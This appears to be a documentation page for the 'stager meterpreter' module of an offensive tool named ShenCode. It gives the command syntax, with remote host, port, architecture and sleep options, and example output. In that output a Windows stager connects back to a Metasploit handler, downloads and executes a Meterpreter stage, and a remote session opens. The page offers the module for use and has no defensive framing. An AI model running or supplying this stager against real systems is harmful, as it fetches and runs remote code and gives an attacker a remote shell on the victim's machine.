ShenCode - meterpreter stager

Meterpreter Stager

Description

stager/meterpreter is only available for Windows

Connect back to a meterpreter stage, which were initiated with reverse_tcp

Command

shencode stager meterpreter [-h] -p PORT -r REMOTE_HOST [-a {x64,x86}] -s SLEEP [-t TIMEOUT]

options:
  -h, --help         show this help message and exit
  -p, --port         Remote port to connect to
  -r, --remote-host  Remote host to connect to

additional:
  -a, --arch         Architecture to use, x64 is the default
  -s, --sleep        Sleep for x seconds before the stage is executed
  -t, --timeout      Connect timeout in seconds, 30 seconds is the default

Example output

Shencode

[*] Creating Socket...
[+] Connection established
[*] Download stage...
[*] Payload size: 203846 bytes
[+] Stage downloaded!
[*] Trying to execute Meterpreter stage...
[+] Memory allocated!

Metasploit

[*] Started reverse TCP handler on 0.0.0.0:9911 
[*] Sending stage (203846 bytes) to 172.17.240.1
[*] Meterpreter session 5 opened (172.17.253.140:9911 -> 172.17.240.1:37692) at 2025-01-27 00:52:05 +0100

meterpreter >